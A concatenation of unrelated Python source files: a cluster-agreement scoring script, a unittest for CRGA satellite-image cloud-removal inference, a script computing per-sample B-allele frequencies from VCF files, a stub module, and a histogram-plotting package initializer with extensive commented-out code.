    for i in range(num_folders):
        base_i = os.path.dirname(folders[i])
        Ci = np.loadtxt(os.path.join(folders[i], 'cents.dat'))
        train_i = np.loadtxt(os.path.join(base_i, 'train.dat'), dtype='bool')
        assign_i = np.loadtxt(os.path.join(folders[i], 'assign.dat'))
        # NOTE: j starts at i, so each fold is also compared with itself.
        for j in range(i, num_folders):
            base_j = os.path.dirname(folders[j])
            Cj = np.loadtxt(os.path.join(folders[j], 'cents.dat'))
            dists = dist.dist_all(Ci, Cj, rolling=True)[0]
            argsrt = dists.argsort(axis=1)
            train_j = np.loadtxt(os.path.join(base_j, 'train.dat'), dtype='bool')
            assign_j = np.loadtxt(os.path.join(folders[j], 'assign.dat'))
            for k in range(argsrt.shape[0]):
                first = True
                for o in argsrt[k]:
                    ids_k = set(ids[train_i][assign_i == k])
                    ids_o = set(ids[train_j][assign_j == o])
                    n_inter = len(ids_k.intersection(ids_o))
                    # The closest centroid counts as agreement, the rest as disagreement.
                    if first:
                        first = False
                        agree += n_inter
                    else:
                        diff += n_inter
    total = agree + diff
    # ROBUSTNESS: avoid ZeroDivisionError when no folds/intersections exist.
    if total == 0:
        print('No comparisons performed')
        return
    print('AgreedProb = ', agree / total)
    print('DisagreeProb = ', diff / total)


if __name__ == '__main__':
    sys.exit(plac.call(main))
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Processor for CRGA models"""
import otbApplication
from decloud.core import system
import pyotb
import unittest
from decloud.production import crga_processor
from decloud.production.inference import inference
from .decloud_unittest import DecloudTest
import datetime
def get_timestamp(yyyymmdd):
    """Convert a YYYYMMDD date string to its UTC POSIX timestamp, as a string."""
    parsed = datetime.datetime.strptime(yyyymmdd, '%Y%m%d')
    utc_dt = parsed.replace(tzinfo=datetime.timezone.utc)
    return str(utc_dt.timestamp())
class InferenceTest(DecloudTest):
    """End-to-end reconstruction tests for the CRGA model.

    Each test feeds S1/S2 acquisitions at t-1, t and t+1 (plus a DEM) into the
    saved model and compares the reconstructed raster against a baseline.
    """
    def test_inference_with_mosaic(self):
        # Logger
        system.basic_logging_init()
        # Baseline
        baseline_path = self.get_path("baseline/reconstructed_baseline_w_mosaic.tif")
        # Model
        model_path = self.get_path("models/crga_os2david_occitanie_pretrained")
        # Input sources
        s1_tm1 = [
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20200929t060008_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20200930txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201001txxxxxx_from-10to3dB.tif')]
        s2_tm1 = [
            self.get_path(
                'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200926-103901-393_L2A_T31TEJ_C_V2-2/SENTINEL2B_20200926-103901-393_L2A_T31TEJ_C_V2-2_FRE_10m.tif'),
            self.get_path(
                'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200929-104857-489_L2A_T31TEJ_C_V2-2/SENTINEL2B_20200929-104857-489_L2A_T31TEJ_C_V2-2_FRE_10m.tif')]
        s1_t = [
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201011t060008_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201013txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201012txxxxxx_from-10to3dB.tif')]
        s2_t = [
            self.get_path(
                'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201012-105848-497_L2A_T31TEJ_C_V2-2/SENTINEL2B_20201012-105848-497_L2A_T31TEJ_C_V2-2_FRE_10m.tif')]
        s1_tp1 = [
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201025txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201024txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201023t060008_from-10to3dB.tif')]
        s2_tp1 = [
            self.get_path(
                'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201026-103901-924_L2A_T31TEJ_C_V2-2/SENTINEL2B_20201026-103901-924_L2A_T31TEJ_C_V2-2_FRE_10m.tif'),
            self.get_path(
                'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2A_20201024-104859-766_L2A_T31TEJ_C_V2-2/SENTINEL2A_20201024-104859-766_L2A_T31TEJ_C_V2-2_FRE_10m.tif')]
        # Input sources: mosaic each date's acquisitions with per-sensor nodata
        sources = {'s1_tm1': pyotb.Mosaic(il=s1_tm1, nodata=0),
                   's2_tm1': pyotb.Mosaic(il=s2_tm1, nodata=-10000),
                   's1_tp1': pyotb.Mosaic(il=s1_tp1, nodata=0),
                   's2_tp1': pyotb.Mosaic(il=s2_tp1, nodata=-10000),
                   's1_t': pyotb.Mosaic(il=s1_t, nodata=0),
                   's2_t': pyotb.Mosaic(il=s2_t, nodata=-10000),
                   'dem': self.get_path('baseline/PREPARE/DEM_PREPARE/T31TEJ.tif')}
        # Sources scales (DEM is at half resolution)
        sources_scales = {"dem": 2}
        # Inference
        out_tensor = "s2_estim"
        outpath = '/tmp/reconstructed_w_mosaic.tif'
        processor = inference(sources=sources, sources_scales=sources_scales, pad=64,
                              ts=256, savedmodel_dir=model_path, out_tensor=out_tensor, out_nodatavalue=-10000,
                              out_pixeltype=otbApplication.ImagePixelType_int16,
                              nodatavalues={"s1_tm1": 0, "s2_tm1": -10000, "s1_tp1": 0,
                                            "s2_tp1": -10000, "s1_t": 0, "s2_t": -10000})
        processor.write(out=outpath, filename_extension="&streaming:type=tiled&streaming:sizemode=height&"
                                                        "streaming:sizevalue=256&"
                                                        "gdal:co:COMPRESS=DEFLATE&gdal:co:TILED=YES")
        # Just a dummy test
        self.assertTrue(system.file_exists(outpath))
        self.compare_images(outpath, baseline_path)
        self.compare_raster_metadata(outpath, baseline_path)
    def test_inference_with_generic_preprocessor(self):
        # Logger
        system.basic_logging_init()
        # Baseline
        baseline_path = self.get_path("baseline/reconstructed_baseline_w_preprocessor.tif")
        # Model
        model_path = self.get_path("models/crga_os2david_occitanie_pretrained")
        # Input sources (directories here: the preprocessor resolves the rasters)
        s1_tm1 = [
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20200929t060008_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20200930txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201001txxxxxx_from-10to3dB.tif')]
        s2_tm1 = [
            self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200926-103901-393_L2A_T31TEJ_C_V2-2/'),
            self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200929-104857-489_L2A_T31TEJ_C_V2-2/')]
        s1_t = [
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201011t060008_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201013txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201012txxxxxx_from-10to3dB.tif')]
        s2_t = self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201012-105848-497_L2A_T31TEJ_C_V2-2')
        s1_tp1 = [
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201025txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201024txxxxxx_from-10to3dB.tif'),
            self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201023t060008_from-10to3dB.tif')]
        s2_tp1 = [
            self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201026-103901-924_L2A_T31TEJ_C_V2-2'),
            self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2A_20201024-104859-766_L2A_T31TEJ_C_V2-2/')]
        outpath = '/tmp/reconstructed_w_preprocessor.tif'
        crga_processor.crga_processor(il_s1before=s1_tm1, il_s2before=s2_tm1,
                                      il_s1=s1_t, in_s2=s2_t,
                                      il_s1after=s1_tp1, il_s2after=s2_tp1,
                                      dem=self.get_path('baseline/PREPARE/DEM_PREPARE/T31TEJ.tif'),
                                      output=outpath, maxgap=48, savedmodel=model_path)
        # Just a dummy test
        self.assertTrue(system.file_exists(outpath))
        self.compare_images(outpath, baseline_path)
        self.compare_raster_metadata(outpath, baseline_path)
if __name__ == '__main__':
    unittest.main()
|
python
|
#!/usr/bin/env python
# Copyright (c) 2018 Harold Wang, Ryan L. Collins, and the Talkowski Lab
# Distributed under terms of the MIT License (see LICENSE)
# Contact: Ryan L. Collins <[email protected]>
# gnomAD credits: http://gnomad.broadinstitute.org/
"""
Helper script for workflow to calculates B-allele frequencies
per sample from an input VCF file
"""
#Import libraries
import argparse
from collections import deque
import numpy as np
import pandas as pd
import pysam
import boto3
import sys
#Function to load an S3-hosted VCF
def load_s3vcf(bucket, vcf_path, index_filename=None):
    """
    Open an S3-hosted VCF through a presigned URL.

    Parameters
    ----------
    bucket : str
        S3 bucket
    vcf_path : str
        S3 key
    index_filename : str, optional
        VCF index path, forwarded to pysam

    Returns
    -------
    vcf : pysam.VariantFile
    """
    s3_client = boto3.client('s3')
    # Presign for 24h so long-running scans keep access.
    presigned_url = s3_client.generate_presigned_url(
        ClientMethod='get_object',
        Params={'Bucket': bucket, 'Key': vcf_path},
        ExpiresIn=86400)
    return pysam.VariantFile(presigned_url, index_filename=index_filename)
#Function to filter VCF records
def filter_records(record):
    """
    Screen a VCF record for sites informative for BAF genotyping.

    A record is kept only when it satisfies all of:
    1) biallelic, 2) SNP, 3) FILTER == PASS.

    Parameters
    ----------
    record : pysam.VariantRecord

    Returns
    -------
    record : pysam.VariantRecord or None
        The record itself when it qualifies, otherwise None.
    """
    # More than two alleles: not biallelic.
    if len(record.alleles) > 2:
        return None
    # Keep only records whose FILTER field is exactly PASS.
    if record.filter.keys() != ['PASS']:
        return None
    # Multi-base alleles mean indel/MNP, not SNP.
    ref_allele, alt_allele = record.alleles
    if len(ref_allele) > 1 or len(alt_allele) > 1:
        return None
    return record
#Function to calculate BAF per VCF record
def calc_BAF(record, samples=None):
    """
    Compute the B-allele frequency at one site for each sample.

    Parameters
    ----------
    record : pysam.VariantRecord
    samples : list of str, optional
        Subset of samples in record to consider

    Returns
    -------
    bafs : np.ndarray of float, shape (1, n_samples)
        BAF per sample; np.nan for samples that are not heterozygous
        or have insufficient depth.
    """
    def _is_het(sample):
        # Only 0/1 heterozygous genotypes are informative for BAF.
        return record.samples[sample]['GT'] == (0, 1)

    def _calc_BAF(sample):
        if not _is_het(sample):
            return np.nan
        DP = record.samples[sample]['DP']
        AD = record.samples[sample]['AD']
        # Only SNP sites with depth > 10 contribute to the BAF profile.
        # BUG FIX: use `is not None` rather than `!= None` for the None check.
        if DP is not None and DP > 10:
            return AD[0] / DP
        return np.nan

    if samples is None:
        samples = record.samples.keys()
    # BUG FIX: np.float was deprecated and removed in NumPy 1.24; the builtin
    # float dtype is the documented equivalent.
    bafs = np.atleast_2d(np.array([_calc_BAF(sample) for sample in samples], dtype=float))
    return bafs
#Function to normalize BAF estimations
def normalize_bafs(bafs, max_std=0.2):
    """
    Normalize per-site BAFs and drop outlying sites.

    Sites are re-centered so the per-site median BAF equals 0.5. Sites whose
    BAF standard deviation across samples exceeds *max_std* are discarded;
    single-sample sites (SD is NA) are kept.

    Parameters
    ----------
    bafs : pd.DataFrame (n_sites x n_samples)
        NOTE(review): the original docstring said np.ndarray, but the code
        uses .loc/.isnull/.std, i.e. a pandas DataFrame -- confirm callers.
    max_std : float, optional
        Maximum standard deviation permitted at a site.

    Returns
    -------
    normalized_bafs : pd.DataFrame (n_samples x n_sites)
    """
    # Work in n_samples x n_sites orientation.
    per_sample = bafs.transpose()
    # Drop sites with no informative sample at all (whole column NA).
    informative = ~per_sample.isnull().all()
    per_sample = per_sample.loc[:, informative]
    # Drop high-variance sites; keep single-sample sites where SD is NA.
    site_std = per_sample.std()
    keep = (site_std < max_std) | site_std.isnull()
    per_sample = per_sample.loc[:, keep]
    # Re-center each site's median BAF at 0.5.
    return per_sample - per_sample.median() + 0.5
#Main function
def main():
    """Stream a VCF from stdin, compute normalized per-sample BAFs for each
    informative SNP, and append them to stdout as tab-separated rows
    (chrom, pos, baf, sample)."""
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    # NOTE(review): --batch is parsed but unused; kept for CLI compatibility.
    parser.add_argument('-b', '--batch', default='batch.txt')
    args = parser.parse_args()
    vcf = pysam.VariantFile(sys.stdin)
    while True:
        try:
            record = next(vcf)
            record = filter_records(record)
            if record:
                site = [record.pos]
                # BUG FIX: np.int was deprecated and removed in NumPy 1.24;
                # the builtin int dtype is the documented equivalent.
                site = np.array(site, dtype=int)
                samples = list(vcf.header.samples)
                baf = calc_BAF(record)
                baf = pd.DataFrame(baf)
                baf.columns = samples
                baf = baf.set_index(site)
                # normalize_bafs transposes: rows become samples, columns sites.
                baf = normalize_bafs(baf)
                baf.index.name = 'sample'
                baf = baf.reset_index()
                # Long form: one row per (sample, pos) with its BAF value.
                bf = pd.melt(baf, id_vars=['sample'], var_name='pos', value_name='baf')
                bf = bf.loc[~bf.baf.isnull()]
                called_bafs = bf
                called_bafs['chrom'] = record.chrom
                called_bafs['pos'] = called_bafs.pos.astype(int)
                cols = 'chrom pos baf sample'.split()
                called_bafs = called_bafs[cols]
                if not called_bafs.empty:
                    called_bafs[cols].to_csv(sys.stdout, index=False, mode='a', header=False, sep='\t')
        except StopIteration:
            break
# Entry point: read a VCF from stdin, write BAF rows to stdout.
if __name__ == '__main__':
    main()
|
python
|
"""Lib module for daq sub units"""
pass
|
python
|
#!/usr/bin/env python
r"""Aggregate, create, and save 1D and 2D histograms and binned plots.
"""
# Import sibling submodules so their primary classes can be re-exported below.
from . import agg_plot
from . import hist1d
from . import hist2d
# Package-level aliases: let callers write `from <pkg> import Hist1D` etc.
# instead of reaching into the individual submodules.
AggPlot = agg_plot.AggPlot
Hist1D = hist1d.Hist1D
Hist2D = hist2d.Hist2D
# import pdb # noqa: F401
# import logging
# import numpy as np
# import pandas as pd
# import matplotlib as mpl
# from types import FunctionType
# from numbers import Number
# from matplotlib import pyplot as plt
# from abc import abstractproperty, abstractmethod
# from collections import namedtuple
# from scipy.signal import savgol_filter
# try:
# from astropy.stats import knuth_bin_width
# except ModuleNotFoundError:
# pass
# from . import tools
# from . import base
# from . import labels as labels_module
# # import os
# # import psutil
# # def log_mem_usage():
# # usage = psutil.Process(os.getpid()).memory_info()
# # usage = "\n".join(
# # ["{} {:.3f} GB".format(k, v * 1e-9) for k, v in usage._asdict().items()]
# # )
# # logging.getLogger("main").warning("Memory usage\n%s", usage)
# class AggPlot(base.Base):
# r"""ABC for aggregating data in 1D and 2D.
# Properties
# ----------
# logger, data, bins, clip, cut, logx, labels.x, labels.y, clim, agg_axes
# Methods
# -------
# set_<>:
# Set property <>.
# calc_bins, make_cut, agg, clip_data, make_plot
# Abstract Properties
# -------------------
# path, _gb_axes
# Abstract Methods
# ----------------
# __init__, set_labels.y, set_path, set_data, _format_axis, make_plot
# """
# @property
# def edges(self):
# return {k: v.left.union(v.right) for k, v in self.intervals.items()}
# @property
# def categoricals(self):
# return dict(self._categoricals)
# @property
# def intervals(self):
# # return dict(self._intervals)
# return {k: pd.IntervalIndex(v) for k, v in self.categoricals.items()}
# @property
# def cut(self):
# return self._cut
# @property
# def clim(self):
# return self._clim
# @property
# def agg_axes(self):
# r"""The axis to aggregate into, e.g. the z variable in an (x, y, z) heatmap.
# """
# tko = [c for c in self.data.columns if c not in self._gb_axes]
# assert len(tko) == 1
# tko = tko[0]
# return tko
# @property
# def joint(self):
# r"""A combination of the categorical and continuous data for use in `Groupby`.
# """
# # cut = self.cut
# # tko = self.agg_axes
# # self.logger.debug(f"Joining data ({tko}) with cat ({cut.columns.values})")
# # other = self.data.loc[cut.index, tko]
# # # joint = pd.concat([cut, other.to_frame(name=tko)], axis=1, sort=True)
# # joint = cut.copy(deep=True)
# # joint.loc[:, tko] = other
# # joint.sort_index(axis=1, inplace=True)
# # return joint
# cut = self.cut
# tk_target = self.agg_axes
# target = self.data.loc[cut.index, tk_target]
# mi = pd.MultiIndex.from_frame(cut)
# target.index = mi
# return target
# @property
# def grouped(self):
# r"""`joint.groupby` with appropriate axes passes.
# """
# # tko = self.agg_axes
# # gb = self.data.loc[:, tko].groupby([v for k, v in self.cut.items()], observed=False)
# # gb = self.joint.groupby(list(self._gb_axes))
# # cut = self.cut
# # tk_target = self.agg_axes
# # target = self.data.loc[cut.index, tk_target]
# # mi = pd.MultiIndex.from_frame(cut)
# # target.index = mi
# target = self.joint
# gb_axes = list(self._gb_axes)
# gb = target.groupby(gb_axes, axis=0, observed=True)
# # agg_axes = self.agg_axes
# # gb = (
# # self.joint.set_index(gb_axes)
# # .loc[:, agg_axes]
# # .groupby(gb_axes, axis=0, observed=False)
# # )
# return gb
# @property
# def axnorm(self):
# r"""Data normalization in plot.
# Not `mpl.colors.Normalize` instance. That is passed as a `kwarg` to
# `make_plot`.
# """
# return self._axnorm
# # Old version that cuts at percentiles.
# @staticmethod
# def clip_data(data, clip):
# q0 = 0.0001
# q1 = 0.9999
# pct = data.quantile([q0, q1])
# lo = pct.loc[q0]
# up = pct.loc[q1]
# if isinstance(data, pd.Series):
# ax = 0
# elif isinstance(data, pd.DataFrame):
# ax = 1
# else:
# raise TypeError("Unexpected object %s" % type(data))
# if isinstance(clip, str) and clip.lower()[0] == "l":
# data = data.clip_lower(lo, axis=ax)
# elif isinstance(clip, str) and clip.lower()[0] == "u":
# data = data.clip_upper(up, axis=ax)
# else:
# data = data.clip(lo, up, axis=ax)
# return data
# # New version that uses binning to cut.
# # @staticmethod
# # def clip_data(data, bins, clip):
# # q0 = 0.001
# # q1 = 0.999
# # pct = data.quantile([q0, q1])
# # lo = pct.loc[q0]
# # up = pct.loc[q1]
# # lo = bins.iloc[0]
# # up = bins.iloc[-1]
# # if isinstance(clip, str) and clip.lower()[0] == "l":
# # data = data.clip_lower(lo)
# # elif isinstance(clip, str) and clip.lower()[0] == "u":
# # data = data.clip_upper(up)
# # else:
# # data = data.clip(lo, up)
# # return data
# def set_clim(self, lower=None, upper=None):
# f"""Set the minimum (lower) and maximum (upper) alowed number of
# counts/bin to return aftter calling :py:meth:`{self.__class__.__name__}.add()`.
# """
# assert isinstance(lower, Number) or lower is None
# assert isinstance(upper, Number) or upper is None
# self._clim = (lower, upper)
# def calc_bins_intervals(self, nbins=101, precision=None):
# r"""
# Calculate histogram bins.
# nbins: int, str, array-like
# If int, use np.histogram to calculate the bin edges.
# If str and nbins == "knuth", use `astropy.stats.knuth_bin_width`
# to calculate optimal bin widths.
# If str and nbins != "knuth", use `np.histogram(data, bins=nbins)`
# to calculate bins.
# If array-like, treat as bins.
# precision: int or None
# Precision at which to store intervals. If None, default to 3.
# """
# data = self.data
# bins = {}
# intervals = {}
# if precision is None:
# precision = 5
# gb_axes = self._gb_axes
# if isinstance(nbins, (str, int)) or (
# hasattr(nbins, "__iter__") and len(nbins) != len(gb_axes)
# ):
# # Single paramter for `nbins`.
# nbins = {k: nbins for k in gb_axes}
# elif len(nbins) == len(gb_axes):
# # Passed one bin spec per axis
# nbins = {k: v for k, v in zip(gb_axes, nbins)}
# else:
# msg = f"Unrecognized `nbins`\ntype: {type(nbins)}\n bins:{nbins}"
# raise ValueError(msg)
# for k in self._gb_axes:
# b = nbins[k]
# # Numpy and Astropy don't like NaNs when calculating bins.
# # Infinities in bins (typically from log10(0)) also create problems.
# d = data.loc[:, k].replace([-np.inf, np.inf], np.nan).dropna()
# if isinstance(b, str):
# b = b.lower()
# if isinstance(b, str) and b == "knuth":
# try:
# assert knuth_bin_width
# except NameError:
# raise NameError("Astropy is unavailable.")
# dx, b = knuth_bin_width(d, return_bins=True)
# else:
# try:
# b = np.histogram_bin_edges(d, b)
# except MemoryError:
# # Clip the extremely large values and extremely small outliers.
# lo, up = d.quantile([0.0005, 0.9995])
# b = np.histogram_bin_edges(d.clip(lo, up), b)
# except AttributeError:
# c, b = np.histogram(d, b)
# assert np.unique(b).size == b.size
# try:
# assert not np.isnan(b).any()
# except TypeError:
# assert not b.isna().any()
# b = b.round(precision)
# zipped = zip(b[:-1], b[1:])
# i = [pd.Interval(*b0b1, closed="right") for b0b1 in zipped]
# bins[k] = b
# # intervals[k] = pd.IntervalIndex(i)
# intervals[k] = pd.CategoricalIndex(i)
# bins = tuple(bins.items())
# intervals = tuple(intervals.items())
# # self._intervals = intervals
# self._categoricals = intervals
# def make_cut(self):
# r"""Calculate the `Categorical` quantities for the aggregation axes.
# """
# intervals = self.intervals
# data = self.data
# cut = {}
# for k in self._gb_axes:
# d = data.loc[:, k]
# i = intervals[k]
# if self.clip:
# d = self.clip_data(d, self.clip)
# c = pd.cut(d, i)
# cut[k] = c
# cut = pd.DataFrame.from_dict(cut, orient="columns")
# self._cut = cut
# def _agg_runner(self, cut, tko, gb, fcn, **kwargs):
# r"""Refactored out the actual doing of the aggregation so that :py:class:`OrbitPlot`
# can aggregate (Inbound, Outbound, and Both).
# """
# self.logger.debug(f"aggregating {tko} data along {cut.columns.values}")
# if fcn is None:
# other = self.data.loc[cut.index, tko]
# if other.dropna().unique().size == 1:
# fcn = "count"
# else:
# fcn = "mean"
# agg = gb.agg(fcn, **kwargs) # .loc[:, tko]
# c0, c1 = self.clim
# if c0 is not None or c1 is not None:
# cnt = gb.agg("count") # .loc[:, tko]
# tk = pd.Series(True, index=agg.index)
# # tk = pd.DataFrame(True,
# # index=agg.index,
# # columns=agg.columns
# # )
# if c0 is not None:
# tk = tk & (cnt >= c0)
# if c1 is not None:
# tk = tk & (cnt <= c1)
# agg = agg.where(tk)
# # # Using `observed=False` in `self.grouped` raised a TypeError because mixed Categoricals and np.nans. (20200229)
# # # Ensure all bins are represented in the data. (20190605)
# # # for k, v in self.intervals.items():
# # for k, v in self.categoricals.items():
# # # if > 1 intervals, pass level. Otherwise, don't as this raises a NotImplementedError. (20190619)
# # agg = agg.reindex(index=v, level=k if agg.index.nlevels > 1 else None)
# return agg
# def _agg_reindexer(self, agg):
# # Using `observed=False` in `self.grouped` raised a TypeError because mixed Categoricals and np.nans. (20200229)
# # Ensure all bins are represented in the data. (20190605)
# # for k, v in self.intervals.items():
# for k, v in self.categoricals.items():
# # if > 1 intervals, pass level. Otherwise, don't as this raises a NotImplementedError. (20190619)
# agg = agg.reindex(index=v, level=k if agg.index.nlevels > 1 else None)
# return agg
# def agg(self, fcn=None, **kwargs):
# r"""Perform the aggregation along the agg axes.
# If either of the count limits specified in `clim` are not None, apply them.
# `fcn` allows you to specify a specific function for aggregation. Otherwise,
# automatically choose "count" or "mean" based on the uniqueness of the aggregated
# values.
# """
# cut = self.cut
# tko = self.agg_axes
# self.logger.info(
# f"Starting {self.__class__.__name__!s} aggregation of ({tko}) in ({cut.columns.values})\n%s",
# "\n".join([f"{k!s}: {v!s}" for k, v in self.labels._asdict().items()]),
# )
# gb = self.grouped
# agg = self._agg_runner(cut, tko, gb, fcn, **kwargs)
# return agg
# def get_plotted_data_boolean_series(self):
# f"""A boolean `pd.Series` identifing each measurement that is plotted.
# Note: The Series is indexed identically to the data stored in the :py:class:`{self.__class__.__name__}`.
# To align with another index, you may want to use:
# tk = {self.__class__.__name__}.get_plotted_data_boolean_series()
# idx = tk.replace(False, np.nan).dropna().index
# """
# agg = self.agg().dropna()
# cut = self.cut
# tk = pd.Series(True, index=cut.index)
# for k, v in cut.items():
# chk = agg.index.get_level_values(k)
# # Use the codes directly because the categoricals are
# # failing with some Pandas numpy ufunc use. (20200611)
# chk = pd.CategoricalIndex(chk)
# tk_ax = v.cat.codes.isin(chk.codes)
# tk = tk & tk_ax
# self.logger.info(
# f"Taking {tk.sum()!s} ({100*tk.mean():.1f}%) {self.__class__.__name__} spectra"
# )
# return tk
# # Old version that cuts at percentiles.
# # @staticmethod
# # def clip_data(data, clip):
# # q0 = 0.0001
# # q1 = 0.9999
# # pct = data.quantile([q0, q1])
# # lo = pct.loc[q0]
# # up = pct.loc[q1]
# #
# # if isinstance(data, pd.Series):
# # ax = 0
# # elif isinstance(data, pd.DataFrame):
# # ax = 1
# # else:
# # raise TypeError("Unexpected object %s" % type(data))
# #
# # if isinstance(clip, str) and clip.lower()[0] == "l":
# # data = data.clip_lower(lo, axis=ax)
# # elif isinstance(clip, str) and clip.lower()[0] == "u":
# # data = data.clip_upper(up, axis=ax)
# # else:
# # data = data.clip(lo, up, axis=ax)
# # return data
# #
# # New version that uses binning to cut.
# # @staticmethod
# # def clip_data(data, bins, clip):
# # q0 = 0.001
# # q1 = 0.999
# # pct = data.quantile([q0, q1])
# # lo = pct.loc[q0]
# # up = pct.loc[q1]
# # lo = bins.iloc[0]
# # up = bins.iloc[-1]
# # if isinstance(clip, str) and clip.lower()[0] == "l":
# # data = data.clip_lower(lo)
# # elif isinstance(clip, str) and clip.lower()[0] == "u":
# # data = data.clip_upper(up)
# # else:
# # data = data.clip(lo, up)
# # return data
# @abstractproperty
# def _gb_axes(self):
# r"""The axes or columns over which the `groupby` aggregation takes place.
# 1D cases aggregate over `x`. 2D cases aggregate over `x` and `y`.
# """
# pass
# @abstractmethod
# def set_axnorm(self, new):
# r"""The method by which the gridded data is normalized.
# """
# pass
# class Hist1D(AggPlot):
# r"""Create 1D plot of `x`, optionally aggregating `y` in bins of `x`.
# Properties
# ----------
# _gb_axes, path
# Methods
# -------
# set_path, set_data, agg, _format_axis, make_plot
# """
# def __init__(
# self,
# x,
# y=None,
# logx=False,
# axnorm=None,
# clip_data=False,
# nbins=101,
# bin_precision=None,
# ):
# r"""
# Parameters
# ----------
# x: pd.Series
# Data from which to create bins.
# y: pd.Series, None
# If not None, the values to aggregate in bins of `x`. If None,
# aggregate counts of `x`.
# logx: bool
# If True, compute bins in log-space.
# axnorm: None, str
# Normalize the histogram.
# key normalization
# --- -------------
# t total
# d density
# clip_data: bool
# If True, remove the extreme values at 0.001 and 0.999 percentiles
# before calculating bins or aggregating.
# nbins: int, str, array-like
# Dispatched to `np.histogram_bin_edges` or `pd.cut` depending on
# input type and value.
# """
# super(Hist1D, self).__init__()
# self.set_log(x=logx)
# self.set_axnorm(axnorm)
# self.set_data(x, y, clip_data)
# self.set_labels(x="x", y=labels_module.Count(norm=axnorm) if y is None else "y")
# self.calc_bins_intervals(nbins=nbins, precision=bin_precision)
# self.make_cut()
# self.set_clim(None, None)
# @property
# def _gb_axes(self):
# return ("x",)
# def set_path(self, new, add_scale=True):
# path, x, y, z, scale_info = super(Hist1D, self).set_path(new, add_scale)
# if new == "auto":
# path = path / x / y
# else:
# assert x is None
# assert y is None
# if add_scale:
# assert scale_info is not None
# scale_info = scale_info[0]
# path = path / scale_info
# self._path = path
# set_path.__doc__ = base.Base.set_path.__doc__
# def set_data(self, x, y, clip):
# data = pd.DataFrame({"x": np.log10(np.abs(x)) if self.log.x else x})
# if y is None:
# y = pd.Series(1, index=x.index)
# data.loc[:, "y"] = y
# self._data = data
# self._clip = clip
# def set_axnorm(self, new):
# r"""The method by which the gridded data is normalized.
# ===== =============================================================
# key description
# ===== =============================================================
# d Density normalize
# t Total normalize
# ===== =============================================================
# """
# if new is not None:
# new = new.lower()[0]
# assert new == "d"
# ylbl = self.labels.y
# if isinstance(ylbl, labels_module.Count):
# ylbl.set_axnorm(new)
# ylbl.build_label()
# self._axnorm = new
# def construct_cdf(self, only_plotted=True):
# r"""Convert the obsered measuremets.
# Returns
# -------
# cdf: pd.DataFrame
# "x" column is the value of the measuremnt.
# "position" column is the normalized position in the cdf.
# To plot the cdf:
# cdf.plot(x="x", y="cdf")
# """
# data = self.data
# if not data.loc[:, "y"].unique().size <= 2:
# raise ValueError("Only able to convert data to a cdf if it is a histogram.")
# tk = self.cut.loc[:, "x"].notna()
# if only_plotted:
# tk = tk & self.get_plotted_data_boolean_series()
# x = data.loc[tk, "x"]
# cdf = x.sort_values().reset_index(drop=True)
# if self.log.x:
# cdf = 10.0 ** cdf
# cdf = cdf.to_frame()
# cdf.loc[:, "position"] = cdf.index / cdf.index.max()
# return cdf
# def _axis_normalizer(self, agg):
# r"""Takes care of row, column, total, and density normaliation.
# Written basically as `staticmethod` so that can be called in `OrbitHist2D`, but
# as actual method with `self` passed so we have access to `self.log` for density
# normalization.
# """
# axnorm = self.axnorm
# if axnorm is None:
# pass
# elif axnorm == "d":
# n = agg.sum()
# dx = pd.Series(pd.IntervalIndex(agg.index).length, index=agg.index)
# if self.log.x:
# dx = 10.0 ** dx
# agg = agg.divide(dx.multiply(n))
# elif axnorm == "t":
# agg = agg.divide(agg.max())
# else:
